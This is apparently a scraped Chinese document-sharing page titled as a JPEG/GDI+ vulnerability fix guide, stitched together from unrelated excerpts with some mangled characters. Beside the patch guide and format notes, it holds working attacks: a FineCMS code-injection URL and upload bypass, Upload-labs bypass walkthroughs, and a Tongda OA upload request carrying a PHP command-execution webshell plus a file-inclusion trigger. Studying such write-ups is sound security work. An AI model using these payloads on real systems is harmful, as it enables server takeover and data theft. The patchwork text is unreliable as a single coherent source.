JPEG漏洞解决方案

合集下载

HTTP响应头拆分漏洞

HTTP响应头拆分漏洞

HTTP响应头拆分漏洞HTTP响应头拆分漏洞By ivory(isno@)一:前言“HTTP响应头拆分漏洞”是一种新型的web攻击方案,它重新产生了很多安全漏洞包括:web缓存感染、用户信息涂改、窃取敏感用户页面、跨站脚本漏洞。

这项攻击方案,包括其衍生的一系列技术产生,是由于web应用程序没有对用户的提交进行严格过滤,导致非法用户可以提交一些恶意字符,更具体来说,是对用户输入的CR 和LF字符没有进行严格的过滤。

“HTTP响应头拆分漏洞”及其相关的攻击手段可以在很多的web环境中实现,包括微软的asp、,IBM WebSphere,BEA WebLogic,Jakarta Tomcat,Macromedia oldFusion/MX,Sun Microsystems SunONE;流行的Squid和Apache服务器;流行的微软IE6.0浏览器。

我不是在吹牛,很多大的站点都存在这样的漏洞,这让我大吃一惊。

这篇文章将描述攻击的概念并且提供一些使用实例分析。

二:介绍在HTTP响应头拆分攻击中具体牵涉到三个对象:1.漏洞服务器:即存在漏洞的服务器。

2.攻击工具:比如浏览器,类似IE6.0。

3.攻击者:发动攻击的人。

HTTP响应头拆分攻击本质是:攻击者可以发送一个或几个HTTP指令迫使漏洞服务器产生一个攻击者构想好的输出。

它可以让服务器误把几条HTTP请求看成一次完成的HTTP请求来解释。

第一条请求也许攻击者部分控制着一部分,但这并不是危险的;危险的是,攻击者完全控制着第二条HTTP请求,即从HTTP状态行一直到HTTP请求的尾部。

如果这样可行,攻击者就会发送多个请求指令到目标系统:第一条使得服务器完全接受两个HTTP响应,第二条响应通常是在服务器上请求一些非法资源,而服务器将会自动匹配到第二条响应,输出攻击者想要请求的资源,从而达到攻击者的目的。

通过这个思路,我们可以构造出形形色色的攻击,具体来说:1 跨站脚本攻击(XSS):这是一个非常普通和老式的漏洞,它可以让用户通过运行了一段javascript 或者html代码后,可以截取该用户的cookie和session。

TIFF

TIFF
文档图像中的TIFF
TIFF格式是文档图像和文档管理系统中的标准格式。在这种环境中它通常使用支持黑白(也称为二值或者单 色)图像的CCITT Group IV 2D压缩。在大量生产的环境中,文档通常扫描成黑白图像(而不是彩色或者灰阶图 像)以节约存储空间。A4大小200dpi(每英寸点数分辨率)扫描结果平均大小是30KB,而300dpi的扫描结果是 50KB。300dpi比200dpi更加常用。
简写
TIFF(Tag Image File Format)图像文件是图形图像处理中常用的格式之一,其图像格式很复杂,但由于 它对图像信息的存放灵活多变,可以支持很多色彩系统,而且独立于操作系统,因此得到了广泛应用。在各种地 理信息系统、摄影测量与遥感等应用中,要求图像具有地理编码信息,例如图像所在的坐标系、比例尺、图像上 点的坐标、经纬度、长度单位及角度单位等等。 它最初由 Aldus公司与微软公司一起为PostScript打印开发。
TIFF有一个使用LZW压缩的选项,这是一种减小文件大小的无损技术,但是这项技术在不同的司法权限内为 几个专利所涵盖。到了2005年,除了一个之外这些专利都已经到期,其中包括Unisys所拥有的广为人知又有很多 争议的专利。另外一个著名的专利是IBM拥有的将在2006年8月11日到期的专利,IBM也没有要加强它的意思(who has shown no interest to date in enforcing it)。
尽管现今它是一种被广泛接受的标准格式,当TIFF最初出现的时候,它的可扩展性带来了很多兼容问题。程 序员可以随意定义新的标签和选项,但是并不是所有的实现程序都能支持这些创造出来的标签。作为结果,它的 一个最小特性集成为了“这个”TIFF,大量的TIFF文件和读取它们的代码都是基于简单的32位非压缩图像。

IE11安全策略解决方案

IE11安全策略解决方案

IE11安全公告及解决方案建议1概述 (1)2内容背景说明 (2)2.1基本描述 (2)2.2潜在影响 (2)2.3提示升级窗口说明 (3)3关于升级建议的描述 (4)3.1基本说明 (4)3.2升级Internet Explorer11好处 (4)3.2.1升级的优点 (4)3.2.2IE11更新的功能及工具 (5)3.3IE11所支持的操作系统 (7)3.4升级方案 (7)4升级后影响及解决措施 (9)4.1升级后影响 (9)5兼容性问题解决措施 (11)5.1兼容性视图说明 (11)5.2企业模式(推荐) (12)5.3兼容性视图和企业模式区别 (13)5.4如何使用企业模式 (14)5.4.1支持操作系统 (14)5.4.2实现的步骤 (14)6总结及备注 (18)1 概述本次文档主要就针对Internet Explorer产品相关描述,关于企业当前使用的Internet Explorer版本,微软提供的建议及做法,其中包括:内容的基本背景说明、建议及做法、产生的影响以及面对措施,主要如下:大部分企业可能依然使用早期版本的IE,但由于微软对IE的早期版本不再提供更新和支持,也就意味着用户在今后的使用中,若遇到一些未知的问题,可能将无法的得到理想的解决办法,因为不会有相应的更新和Hotfix以提供帮助。

本次文档将基于上述思路阐述有关IE11问题。

2 内容背景说明2.1基本描述随着微软产品的不断更新,新的产品以及相关的技术服务也将逐渐替代旧的产品。

其中包括IE浏览器的技术服务,微软就针对IE产品发出公告,主要描述了对Internet Explorer 早期版本的支持将于2016年1月12日结束。

也就意味着,Microsoft 将不再为Internet Explorer 早期版本提供安全更新或技术支持。

其中,安全更新用于修补可能被恶意软件利用的漏洞,从而为提高用户及其数据的安全性提供帮助。

定期安全更新帮助保护计算机不受恶意攻击,因此升级和保持最新很重要。

FineCMS5.0.10多个漏洞详细分析过程

FineCMS5.0.10多个漏洞详细分析过程

FineCMS5.0.10多个漏洞详细分析过程0x01 前⾔已经⼀个⽉没有写⽂章了,最近发⽣了很多事情,⽔⽂⼀篇。

今天的这个CMS是FineCMS,版本是5.0.10版本的⼏个漏洞分析,从修补漏洞前和修补后的两⽅⾯去分析。

⽂中的evai是特意写的,因为会触发论坛的防护机制,还有分页那⼀段的代码也去掉了,因为会触发论坛分页的bug。

0x02 环境搭建可以去i春秋的实验,不⽤⾃⼰搭建那么⿇烦了。

0x03 任意⽂件上传漏洞1.漏洞复现⽤⼗六进制编辑器写⼀个有⼀句话的图⽚去⽹站注册⼀个账号,然后到上传头像的地⽅。

抓包,把jepg的改成php发包。

可以看到⽂件已经上传到到/uploadfile/member/⽤户ID/0x0.php2.漏洞分析⽂件:finecms/dayrui/controllers/member/Account.php 177~244⾏/*** 上传头像处理* 传⼊头像压缩包,解压到指定⽂件夹后删除⾮图⽚⽂件*/public function upload() {// 创建图⽚存储⽂件夹$dir = SYS_UPLOAD_PATH.'/member/'.$this->uid.'/';@dr_dir_delete($dir);!is_dir($dir) && dr_mkdirs($dir);if ($_POST['tx']) {$file = str_replace(' ', '+', $_POST['tx']);if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $file, $result)){if (!@file_put_contents($new_file, base64_decode(str_replace($result[1], '', $file)))) {exit(dr_json(0, '⽬录权限不⾜或磁盘已满'));} else {$this->load->library('image_lib');$config['create_thumb'] = TRUE;$config['thumb_marker'] = '';$config['maintain_ratio'] = FALSE;$config['source_image'] = $new_file;foreach (array(30, 45, 90, 180) as $a) {$config['width'] = $config['height'] = $a;$config['new_image'] = $dir.$a.'x'.$a.'.'.$result[2];$this->image_lib->initialize($config);if (!$this->image_lib->resize()) {exit(dr_json(0, '上传错误:'.$this->image_lib->display_errors()));break;}}list($width, $height, $type, $attr) = getimagesize($dir.'45x45.'.$result[2]);!$type && exit(dr_json(0, '图⽚字符串不规范'));}} else {exit(dr_json(0, '图⽚字符串不规范'));}} else {exit(dr_json(0, '图⽚不存在'));}// 上传图⽚到服务器if (defined('UCSSO_API')) {$rt = ucsso_avatar($this->uid, file_get_contents($dir.'90x90.jpg'));!$rt['code'] && $this->_json(0, fc_lang('通信失败:%s', $rt['msg']));}exit('1');}这个我记得在5.0.8的版本有讲过这个代码的漏洞执⾏https:///2018/01/30/The%20latest%20version%20of%20FineCMS%205.0.8%20getshell%20daily%20two%20holes/后来官⽅修复的⽅案是加上了⽩名单了:if (!in_array(strtolower($result[2]), array('jpg', 'jpeg', 'png', 'gif'))) {exit(dr_json(0, '⽬录权限不⾜'));}...$c = 0;if ($fp = @opendir($dir)) {while (FALSE !== ($file = readdir($fp))) {$ext = substr(strrchr($file, '.'), 1);if (in_array(strtolower($ext), array('jpg', 'jpeg', 'png', 'gif'))) {if (copy($dir.$file, $my.$file)) {$c++;}}}closedir($fp);}if (!$c) {exit(dr_json(0, fc_lang('未找到⽬录中的图⽚')));}0x04 任意代码执⾏漏洞1.漏洞复现auth下⾯的分析的时候会说到怎么获取浏览器输⼊:/index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df¶m=action=cache%20name=MEMBER.1%27];phpinfo();$a=[%2712.漏洞分析这个漏洞的⽂件在/finecms/dayrui/controllers/Api.php的data2()public function data2() {$data = array();// 安全码认证$auth = $this->input->get('auth', true);if ($auth != md5(SYS_KEY)) {// 授权认证码不正确$data = array('msg' => '授权认证码不正确', 'code' => 0);} else {// 解析数据$cache = '';$param = $this->input->get('param');if (isset($param['cache']) && $param['cache']) {$cache = md5(dr_array2string($param));$data = $this->get_cache_data($cache);}if (!$data) {// list数据查询$data = $this->template->list_tag($param);$data['code'] = $data['error'] ? 0 : 1;unset($data['sql'], $data['pages']);// 缓存数据$cache && $this->set_cache_data($cache, $data, $param['cache']);}}// 接收参数$format = $this->input->get('format');$function = $this->input->get('function');if ($function) {if (!function_exists($function)) {$data = array('msg' => fc_lang('⾃定义函数'.$function.'不存在'), 'code' => 0); } else {$data = $function($data);}}// 页⾯输出if ($format == 'php') {print_r($data);} elseif ($format == 'jsonp') {// ⾃定义返回名称echo $this->input->get('callback', TRUE).'('.$this->callback_json($data).')';} else {// ⾃定义返回名称echo $this->callback_json($data);}exit;可以看到开头这⾥验证了认证码:// 安全码认证$auth = $this->input->get('auth', true);if ($auth != md5(SYS_KEY)) {// 授权认证码不正确$data = array('msg' => '授权认证码不正确', 'code' => 0);} else {授权码在/config/system.php可以看到SYS_KEY是固定的,我们可以在Cookies找到,/finecms/dayrui/config/config.php⽤浏览器查看Cookies可以看到KEY,但是验证⽤MD5,我们先把KEY加密就⾏了。

Firehunter APT沙箱安全技术方案

Firehunter APT沙箱安全技术方案
基于CPU IPT指令流层级监控
指令集监控 内存分析
沙箱典型部署场景
FireHunter
数据中心服务器区
数据中心服务器区
FireHunter
FireHunter
数据中心服务器区
部门A
部门B
部门C
部门A
部门B
部门C
部门A
部门B
部门C
沙箱与单防火墙联动部署
➢ FireHunter与防火墙联动,使网络具备防御恶意 文件和网站等未知威胁的能力,从而提升整个网 络的安全性。
共享性
沙箱作为目前最为有效的未知威胁 检测手段,其检测结果能否共享至 其他安全设备联动阻断至关重要。
华为沙箱——领先的未知文件检测机制
未知文件 未知文件 未知文件
?
?
?
VM
安全文件 恶意文件 安全文件
华为FireHunter6000系列沙箱
对APT攻击中恶意文件深度检测
价值:检测APT攻击的渗透阶段和控制建立阶段
• 从受攻击地域上看主要集中在北京、广西、江浙地区、 四川等。
APT/未知威胁防御面临的挑战
0Day漏洞正在商品化
0Day在黑市的标价
文件载体的APT攻击占据主流
非文件 载体攻 击, 5%
文件载体…
40%
利用钓鱼邮件附件
• 0Day漏洞一直是APT组织实施攻击的技术制高点。 • 商品化的0Day让APT攻击变得更容易。
web-browsing /newcos102.pdf
Behavior Sequence
Type
Behavior
Request
/international/l oadpdf.php
0:00:21

网页设计与制作实训实施方案

网页设计与制作实训实施方案

网页设计与制作实训实施方案一、实训目标本次网页设计与制作实训的主要目标是让学生掌握网页设计与制作的基本技能和流程,培养学生的创新思维和实践能力,提高学生的团队协作和沟通能力,为学生今后从事相关工作打下坚实的基础。

具体目标包括:1、让学生熟悉网页设计与制作的常用工具和技术,如 HTML、CSS、JavaScript 等。

2、培养学生的网页布局和色彩搭配能力,使学生能够设计出美观、实用的网页界面。

3、提高学生的网页交互设计能力,让学生能够实现网页的动态效果和用户交互功能。

4、培养学生的团队协作精神,让学生在团队中学会分工合作、相互沟通和协调。

5、增强学生的问题解决能力和自主学习能力,让学生能够独立解决在网页设计与制作过程中遇到的各种问题。

二、实训内容1、网页设计基础知识网页的基本概念和构成要素,如网页的结构、布局、色彩、字体等。

网页设计的原则和规范,如用户体验、可用性、可访问性等。

2、 HTML 与 CSS 基础HTML 标签的使用,如标题标签、段落标签、链接标签、图像标签等。

CSS 样式的应用,如字体样式、背景样式、边框样式、布局样式等。

3、网页布局设计常见的网页布局方式,如流式布局、固定布局、响应式布局等。

使用CSS 实现网页的布局,如浮动布局、定位布局、弹性布局等。

4、网页色彩搭配色彩的基本原理和搭配原则,如色相、饱和度、明度等。

运用色彩心理学知识,为网页选择合适的色彩方案。

5、网页图像处理图像的格式和优化,如 JPEG、PNG、GIF 等。

使用图像编辑工具,如 Photoshop,对网页图像进行处理和制作。

6、网页交互设计JavaScript 基础语法和常用函数,如变量、数据类型、控制结构等。

使用 JavaScript 实现网页的动态效果,如轮播图、下拉菜单、表单验证等。

7、网页项目实践学生分组完成一个完整的网页设计与制作项目,包括需求分析、设计规划、页面制作、测试发布等环节。

三、实训方法1、课堂讲授由教师讲解网页设计与制作的相关知识和技能,通过案例分析和演示,让学生直观地了解网页设计与制作的过程和方法。

PEG压缩编解码的实现

实验三 JPEG压缩编解码的实现一实验目的使学生掌握DIB文件和JPEG文件的读写过程,能够在程序中打开DIB文件或JPEG文件,可以进行DIB文件和JPEG文件之间的格式转换。

二实验环境具有多媒体处理功能的计算安装有Windows操作系统,安装有Visual c++6.0程序设计软件。

三实验要求学习相关理论指导,掌握相关程序设计知识;按照实验步骤要求完成程序设计任务,书写实验报告,试验报告中要求包含程序实现的主要程序代码。

四实验内容和实验步骤1)创建基于单文档的应用程序:RWJpegExp,并支持窗口滚动2)为项目添加CJpeg类和jpeglib2库文件3)通过“Project/Settings…”菜单,选中Link选项卡如下设置:4)利用ClassWaizard重载CwinApp的OnFileOpen()函数。

void CRWJpegExpApp::OnFileOpen(){// TODO: Add your command handler code hereCString szOpenFilter = "图象文件|*.bmp; *.dib; *.jpg; *.jpe; *.jpeg; |位图文件(*.bmp;*.dib)|*.bmp; *.dib|JPEG文件 (*.jpg;*.jpe;*.jpeg)|*.jpg; *.jpe; *.jpeg|All Files (*.*)|*.*||";CFileDialog FileDlg(TRUE, "*.bmp", NULL, OFN_HIDEREADONLY | OFN_OVERWRITEPROMPT, szOpenFilter);if (FileDlg.DoModal() == IDOK)OpenDocumentFile(FileDlg.m_ofn.lpstrFile);}5)利用ClassWaizard重载CRWJpegExpDoc类的的OnOpenDocument()函数。

江西信息应用单招试题答案

江西信息应用单招试题答案一、选择题(每题2分,共20分)1. 信息应用技术中,以下哪个选项不属于基本的信息技术工具?A. 计算机B. 智能手机C. 打印机D. 微波炉答案:D2. 以下哪个不是信息安全的基本要素?A. 机密性B. 完整性C. 可用性D. 可扩展性答案:D3. 在网络信息传播中,以下哪个行为不属于信息泄露?A. 未经授权访问他人数据B. 公开发布个人信息C. 遵守信息保密协议D. 非法下载他人作品答案:C4. 数据库管理系统的主要功能不包括以下哪一项?A. 数据存储B. 数据查询C. 数据加密D. 数据备份答案:C5. 以下哪个是网络信息安全的威胁?A. 软件升级B. 网络攻击C. 系统维护D. 硬件故障答案:B6. 以下哪种加密技术主要用于数据传输过程中的安全?A. 对称加密B. 非对称加密C. 哈希算法D. 数字签名答案:B7. 以下哪个不是信息应用中的数据分析方法?A. 描述性分析B. 预测性分析C. 因果性分析D. 可视化分析答案:C8. 在信息管理中,以下哪个不是信息资源管理的关键要素?A. 信息收集B. 信息组织C. 信息共享D. 信息购买答案:D9. 以下哪个不是信息应用中的网络协议?A. TCP/IPB. HTTPC. FTPD. JPEG答案:D10. 以下哪个不是信息应用中的编程语言?A. JavaB. PythonC. C++D. MP3答案:D二、简答题(每题10分,共30分)1. 请简述信息应用中数据备份的重要性。

答案:数据备份是信息应用中的重要环节,它能够确保在数据丢失或损坏时,能够迅速恢复原始数据,减少数据丢失带来的损失。

数据备份可以防止硬件故障、软件错误、人为操作失误等导致的信息丢失,是保障信息安全和数据完整性的重要手段。

2. 描述一下信息安全中的“三要素”。

答案:信息安全中的“三要素”指的是机密性、完整性和可用性。

机密性是指保护信息不被未授权的人访问;完整性是指确保信息在存储和传输过程中不被非法修改;可用性是指确保授权用户能够及时获取所需信息。

Upload-labs文件上传靶场通关教程

Upload-labs ⽂件上传靶场通关教程Upload-labs ⽂件上传靶场通关教程Pass-01⾸先直接上传⼀个webshell ,果然被禁⽌了,弹出不允许上传php类型的⽂件然后我准备抓包改改⽂件类型的,发现压根抓不到,弹框在抓包之前,就说明这是做的⼀个前端限制,所以我们只需要找到前端js代码把它删掉然后上传就⾏了把上⾯这个限制的js 代码删掉,然后直接上传⼀个webshell即可,上传成功之后我们读取看看Pass-02这⼀关查看⽹页源码发现还是有前端限制,但是应该没那么简单不然就跟第⼀关⼀样了,我们尝试删除前端js 代码限制,然后抓包修改⽂件的MIME 类型为 然后上传,发现上传成功/etc/passwd image/jpegPass-03这⼀关我们经过测试发现是检查⽂件上传的后缀不允许是,然后查看源码发现会进⾏⼩写转换,所以⼤写绕过肯定是不⾏的,但是我们可以⽤ 和 这些后缀进⾏绕过,上传⽂件读取⽂件Pass-04第四关我们查看提⽰发现禁⽌上传下⾯这些常⽤后缀所以这个时候我们就可以上传 重写⽂件解析绕过⽂件的作⽤:.htaccess ⽂件是Apache 服务器的⼀个配置⽂件,负责相关⽬录下的⽹页配置。

通过htaccess ⽂件,可以帮我们实现:⽹页301重定向、⾃定义404错误页⾯、改变⽂件扩展名、允许/阻⽌特定的⽤户或者⽬录的访问、禁⽌⽬录列表、配置默认⽂档等功能。

我们这⾥⽤到的就是⽂件的改变⽂件扩展名的功能代码:这个时候我们上传⼀个的⽂件,他的后缀会以php ⽂件解析。

上传成功读取本pass 禁⽌上传.asp|.aspx|.php|.jsp 后缀⽂件php3php5/etc/passwd .htaccess .htaccess .htaccess .htaccess <FilesMatch "shell.jpg"SetHandler application/x-httpd-php</FilesMatch>shell.jpg /etc/passwd这⼀关我们看提⽰发现⽂件也被禁⽌上传了但是我们看源码发现没有了转换⼩写函数,就是这个:,所以这⼀关我们可以⼤⼩写混写绕过,上传成功读取⽂件Pass-06这⼀关增加了转换⼩写的函数,所以说⼤⼩混写肯定不⾏了,但是删掉了去掉⽂件⾸尾去空的函数所以说这关我们可以在⽂件名末尾加空格绕过,上传成功读取⽂件Pass-07这⼀关查看提⽰还是禁⽌了所有能上传的后缀,但是少了这⼀⾏代码这样我们就可以这样构造⽂件名绕过多加⼀个点,因为这⼀⾏代码下⾯就是这⼀⾏代码经过我们构造payload 之后,他就会截取⼀个空的字符串去⿊名单⾥⾯⽐较,发现都不在从⽽进⾏绕过了。

通达OA文件上传+文件包含漏洞

通达OA⽂件上传+⽂件包含漏洞通达OA⽂件上传+⽂件包含漏洞复现 该漏洞在绕过⾝份验证的情况下通过⽂件上传漏洞上传恶意php⽂件,组合⽂件包含漏洞最终造成远程代码执⾏漏洞,从⽽导致可以控制服务器system权限。

在通达OA上传漏洞中,上传⽂件upload.php⽂件中存在⼀个$p参数,如果$p⾮空就可以跳过auth.php验证机制,话不多说直接上源码: ⽂件包含漏洞存在于geteway.php⽂件中,可直接包含url 下载安装通达OA并访问 访问上传⽬录,我使⽤的是V11版本,路径为:ispirit/im/upload.php Burp抓包构造数据包上传⽂件,POC为:POST /ispirit/im/upload.php HTTP/1.1Host: 192.168.1.106Content-Length: 658Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGBAccept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5Cookie: PHPSESSID=123Connection: close------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="UPLOAD_MODE"2------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="P"123------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="DEST_UID"1------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="ATTACHMENT"; filename="jpg"Content-Type: image/jpeg<?php$command=$_POST[&apos;cmd&apos;];$wsh = new COM(&apos;WScript.shell&apos;);$exec = $wsh->exec("cmd /c ".$command);$stdout = $exec->StdOut();$stroutput = $stdout->ReadAll();echo $stroutput;>------WebKitFormBoundarypyfBh1YB4pV8McGB-- 发送poc 上传成功;上传成功后访问⽂件包含路径/ispirit/interface/geteway.php burp抓包构造数据包:POST /mac/gateway.php HTTP/1.1Host: 10.10.20.116:88(根据⾃⼰的IP⽽定)Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.21.0Content-Length: 69Content-Type: application/x-www-form-urlencodedjson={"url":"/general/../../attach/im/2003/941633647.jpg"}&cmd=whoami 发送指令可发现命令执⾏成功: 更新官⽅补丁。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

JPEG漏洞解决方案
作者:D元素 文章来源:互联网 点击数: 22 更新时间:2006-2-22 21:29:59
9月14日微软发布了修补JPEG文件溢出漏洞的安全更新程序MS04-028《JPEG 处理时 (GDI
+) 的缓冲区溢出可能允许执行代码的安全公告》以来,各个安全网站和黑客论坛内十分活跃。针
对微软GDI+漏洞的新攻击代码陆续出现,其散播范围也越来越广,而该JPEG威胁又被微软视为“严重级”
安全漏洞,因此其危害可想而知。一种新型的“图片病毒”有可能随时爆发。

JPEG图片漏洞存在于微软提供的一个用于图形开发的动态链接库(Gdiplus.dll)中,电子图片文件会被该
系统文件使用,从而可被病毒制造者加入各种病毒代码,以用于进行偷盗密码、进行网络攻击的重要手段。
该程序已经广泛应用于各种图形程序的开发,但是,系统文件只在Windows XP及以上系统中才被默认安
装,因此大部份常用的非微软的应用软件在安装时会自带该文件。由于众多软件都调用了这个动态链接库
处理JPEG图片,使得该漏洞的涉及面非常广,操作系统,如WinXP SP1、办公软件,如MS Office SP3、
聊天工具,如QQ2004、图像处理软件,PhotoShop等等。

注意:
1、WinXP SP2不受其影响,不要再给打KB833987补丁;
2、应对JPEG图片漏洞不能只打系统补丁,为了真正防止该漏洞的危害,应该把这些第三方软件所
使用的Gdiplus.dll文件全部替换为已经修补好的Gdiplus.dll文件。

漏洞的危害:
使用WinXP自带图象查看器打开恶意JPEG文件时,会导致WinXP自带图象查看器的崩溃:

而打完补丁后,则可以正常浏览恶意JPEG文件:
预防措施:
一、给系统及及微软应用程序都打上补丁:
1、Microsoft Windows XP、Microsoft Windows XP Service Pack 1:
XP-KB833987-x86-CHS.EXE" target=_blank>http://download.microsoft.com/download/0/6/9/069a5152-2932-4
407-be60-adbc9e8fa4f7/WindowsXP-KB833987-x86-CHS.EXE

2、Microsoft Windows Server 2003 :
http://download.microsoft.com/download/f/a/b/faba4abe-2735-4018-a947-0ae9f0162b09/WindowsServer2003-KB
833987-x86-CHS.EXE
3、Internet Explorer 6 Service Pack 1 :
http://download.microsoft.com/download/9/1/d/91d72bac-45e5-404b-8705-32da6377a7d4/IE6.0sp1-KB833989-x
86-CHS.exe

4、Microsoft Office XP:
http://download.microsoft.com/download/3/7/0/37052d05-3500-4a8c-9715-404b41d6f735/officexp-kb832332-clie
nt-chs.exe

5、Microsoft Office 2003 :
http://download.microsoft.com/download/7/0/f/70f72655-7058-4892-a835-e7bf0ba1b51c/office2003-kb838905-cli
ent-chs.exe

其余更新请浏览Microsoft 安全公告 MS04-028:
http://www.microsoft.com/china/technet/security/bulletin/MS04-028.mspx

二、更新非微软应用程序:
以下诸多方法,任用其一即可。

1、更新法:
①打开“我的电脑”
②按F3,选择“搜索所有文件和文件夹”,在文件名中填写“GDIPlus.dll”进行搜索。查找哪些程序自带了
GDIPlus.dll 文件,如果发现某软件自带了GDIPlus.dll,请您与该软件的生产商联系,查询是否更新或如何
更新。

如:腾讯QQ需要更新到QQ 2004 正式版 sp1,该版本修正了GDI+漏洞:
http://im.qq.com/qq/mo.shtml?/download/qq2004.shtml

2、替换法:
即将第三方软件所使用的Gdiplus.dll文件全部替换为已经修补好的Gdiplus.dll文件。

①使用工具替换:
金山毒霸"JEPG病毒及漏洞检测"工具可以全盘扫描磁盘上的所有Gdiplus.dll文件,包括系统及第三方
应用软件中的该文件。将存在漏洞的Gdiplus.dll文件找出来,并可自动将其修补。
http://db.kingsoft.com/download/3/219.shtml

②手工替换法:
1、请到微软官方网站下载没漏洞的Gdiplus.dll安装:
http://download.microsoft.com/download/a/b/c/abc45517-97a0-4cee-a362-1957be2f24e1/gdiplus_dnld.exe
2、打开"我的电脑", 按F3,选择"搜索所有文件和文件夹",在文件名中填写"GDIPlus.dll"进行搜索。
查找哪些程序自带了GDIPlus.dll 文件;
3、将从微软网站中下载安装得到的Gdiplus.dll文件替换这些文件。

附:使用了Gdiplus.dll文件的常用第三方软件,如果您装了以下软件请注意检查。目前还有一些软件
使用了这个系统文件,最简单的办法是,通过操作系统查找文件功能,查找GDIPLUS.dll文件,看看有多
少软件在使用。

使用了GDIPLUS.dll文件的常用软件如下:
QQ 2004
Adobe ImageReady CS
Dreamweaver MX 2004
PhotoShop
Discreet 3dmax6.0
MyIM即时通讯软件 2004
快递通 v1.8
WPS Office
剑侠情缘网络版
Nero BURNING ROM 6

中毒后的查杀:
各大杀毒软件更新病毒库到最新后,都可以查杀JPEG恶意代码图片病毒。

金山JPEG恶意代码图片病毒专杀:http://db.kingsoft.com/download/othertools/DubaTool_JPEG.exe
江民Jpeg文件漏洞防毒“疫苗”下载:http://update.jiangmin.com/download/KVPatch.exe
瑞星图片病毒专用查杀工具(含内存补丁工具)下载:http://it.rising.com.cn/service/technology/RS_RavJPG.h
tm

相关文档
最新文档